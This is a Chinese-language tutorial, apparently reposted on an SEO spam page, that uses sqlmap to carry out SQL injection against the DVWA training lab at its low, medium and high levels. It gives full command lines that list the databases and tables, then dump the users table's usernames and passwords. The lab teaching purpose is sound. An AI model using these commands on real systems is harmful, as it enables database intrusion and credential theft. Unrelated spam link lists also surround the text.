当前位置: 首页 > wzjs >正文

什么样的网站可以做外链象山seo外包服务优化

什么样的网站可以做外链,象山seo外包服务优化,昆明网站排名优化,centos部署wordpress本文章仅用于学习,禁止用于其他 文章目录 前言一、sqlmap工具(kali自带)二、DVWA靶场三种模式下sqlmap使用Low级别爆库爆表爆字段爆密码 medium爆库爆表爆字段爆密码 high爆库爆表爆字段爆密码 总结 前言 SQL注入(SQL Injection&…

本文章仅用于学习,禁止用于其他

文章目录

  • 前言
  • 一、sqlmap工具(kali自带)
  • 二、DVWA靶场三种模式下sqlmap使用
    • Low级别
      • 爆库
      • 爆表
      • 爆字段
      • 爆密码
    • medium
      • 爆库
      • 爆表
      • 爆字段
      • 爆密码
    • high
      • 爆库
      • 爆表
      • 爆字段
      • 爆密码
  • 总结


前言

SQL注入(SQL Injection,简称SQLi)是一种常见的网络安全攻击手段。攻击者通过在Web应用程序的输入字段(如表单输入框、URL参数等)中注入恶意的SQL代码,从而欺骗数据库执行这些非预期的指令。这种攻击通常发生在应用程序对用户输入的数据未进行充分验证和过滤的情况下


一、sqlmap工具(kali自带)

所需环境:burpsuite,python2.7.18,pikachu,sqlmap1.5,phpstudy7以下

sqlmap1.9需配置python3.6以上环境

kali上只需要安装好burpsuite就行

二、DVWA靶场三种模式下sqlmap使用

Low级别

爆库

python sqlmap的环境安装路径\sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"  --cookie="security=low; PHPSESSID=fpghhenonb58lv7b5gfsgajk87" --batch  --current-db

这里–cookie值抓包查看
在这里插入图片描述
–batch --current-db爆数据库
在这里插入图片描述

kali版

sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"  --cookie="security=low; PHPSESSID=fpghhenonb58lv7b5gfsgajk87" --batch  --current-db

爆表

python sqlmap的环境安装路径\sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"  --cookie="security=low; PHPSESSID=u7kr4u786asmevlpqvg07nt8t2" --batch -D dvwa -tables

-D+数据库 -tables查表

kali版

sqlmap -u "http://127.0.0.1/01/vulnerabilities/sqli/?id=1&Submit=Submit#"  --cookie="security=low; PHPSESSID=fpghhenonb58lv7b5gfsgajk87" --batch -D dvwa -tables

爆字段

python sqlmap的环境安装路径\sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"  --cookie="security=low; PHPSESSID=u7kr4u786asmevlpqvg07nt8t2" --batch -D dvwa -columns

在这里插入图片描述

爆密码

python sqlmap的环境安装路径\sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"  --cookie="security=low; PHPSESSID=u7kr4u786asmevlpqvg07nt8t2" --batch -D dvwa -T users -C user,password -dump

-T+表 -C+查询密码和用户名 -dump打印
在这里插入图片描述

medium

Medium+ --data

爆库

python  sqlmap的环境安装路径\sqlmap.py -u "http://127.0.0.1/01/vulnerabilities/sqli/?"  --cookie="security=medium; PHPSESSID=fpghhenonb58lv7b5gfsgajk87" --data  "id=1&Submit=Submit" --current-db

在这里插入图片描述

爆表

python  sqlmap的环境安装路径\sqlmap.py -u "http://127.0.0.1/01/vulnerabilities/sqli/?"  --cookie="security=medium; PHPSESSID=fpghhenonb58lv7b5gfsgajk87" --data  "id=1&Submit=Submit" --batch -D dvwa -tables

在这里插入图片描述

爆字段

python  sqlmap的环境安装路径\sqlmap.py -u "http://127.0.0.1/01/vulnerabilities/sqli/?"  --cookie="security=medium; PHPSESSID=fpghhenonb58lv7b5gfsgajk87" --data  "id=1&Submit=Submit" --batch -D dvwa -columns

在这里插入图片描述

爆密码

python  sqlmap的环境安装路径\sqlmap.py -u "http://127.0.0.1/01/vulnerabilities/sqli/?"  --cookie="security=medium; PHPSESSID=fpghhenonb58lv7b5gfsgajk87" --data  "id=1&Submit=Submit" --batch -D dvwa -T users -C user,password -dump

在这里插入图片描述

high

high+ --second-url注入

爆库

python  sqlmap的环境安装路径\sqlmap.py -u "127.0.0.1/01/vulnerabilities/sqli/session-input.php#" --data "id=1&Submit=Submit" --cookie="id=1;security=high; PHPSESSID=1ndi0p1u3f7g535olfbotrjo80" --second-url "http://127.0.0.1/01/vulnerabilities/sqli/" --current-db

在这里插入图片描述

爆表

python  sqlmap的环境安装路径\sqlmap.py -u "127.0.0.1/01/vulnerabilities/sqli/session-input.php#" --data "id=1&Submit=Submit" --cookie="id=1;security=high; PHPSESSID=1ndi0p1u3f7g535olfbotrjo80" --second-url "http://127.0.0.1/01/vulnerabilities/sqli/" --batch -D dvwa -tables

在这里插入图片描述

爆字段

python  sqlmap的环境安装路径\sqlmap.py -u "127.0.0.1/01/vulnerabilities/sqli/session-input.php#" --data "id=1&Submit=Submit" --cookie="id=1;security=high; PHPSESSID=1ndi0p1u3f7g535olfbotrjo80" --second-url "http://127.0.0.1/01/vulnerabilities/sqli/" --batch -D dvwa -columns

在这里插入图片描述

爆密码

python  sqlmap的环境安装路径\sqlmap.py -u "127.0.0.1/01/vulnerabilities/sqli/session-input.php#" --data "id=1&Submit=Submit" --cookie="id=1;security=high; PHPSESSID=1ndi0p1u3f7g535olfbotrjo80" --second-url "http://127.0.0.1/01/vulnerabilities/sqli/" --batch -D dvwa -T users -C user,password -dump

在这里插入图片描述


总结

当应用程序将用户输入直接拼接到SQL查询语句中时,攻击者可以构造恶意输入,改变原本SQL语句的结构和逻辑,进而实现对数据库的非法操作。例如,攻击者可以通过SQL注入绕过身份验证、获取敏感信息(如用户密码、信用卡信息等)、篡改数据或执行其他恶意操作

http://www.dtcms.com/wzjs/512310.html

相关文章:

  • 广州五屏网站建设竞价推广出价多少合适
  • 上海网站开发一对一培训价格合肥seo管理
  • 咋做黄页网站温州网站建设开发
  • 抓取网站访客qq号码seo是啥
  • 网站备案拍照背景图企业员工培训课程
  • 怎么做视频网站美橙互联建站
  • 游戏ui设计最好的培训机构seo sem是什么职位
  • 企业信息管理系统的组成不包括东莞网站seo优化托管
  • 苹果手机做电影网站有哪些浙江网站建设推广
  • 网站建设与开发论文百度推广开户2400
  • 免费的企业建站系统百度关键词优化有效果吗
  • 网站建设维护工作关键词搜索挖掘爱网站
  • 怎么做简单的网站首页网站优化设计的基础是网站基本要素及每个细节的优化
  • 网站怎么开通微信支付百度推广优化工具
  • 代做网站的公司北京朝阳区
  • 增城微信网站建设自助建站网站模板
  • 票务网站开发端口小程序如何推广运营
  • 域名解析好了怎么做网站找培训机构的app
  • 郑州网站建设的软件优化公司结构
  • 专业制作网站 上海网络服务商怎么咨询
  • 金华电子商务网站建设互联网平台公司有哪些
  • 网站建设专业团队图片深圳搜索引擎
  • 制作网站对话框申请百度收录网址
  • 网站建设前期资料提供北京网络营销策划公司
  • 网站开发的初级技术员最新新闻
  • 建设银行官网首页 网站免费创建个人网站
  • 长沙企业建网站识图找图
  • 试玩网站怎么做产品软文
  • 沈阳网站建设小工作室百度搜索关键词指数
  • 公司网站开发策划书专业地推团队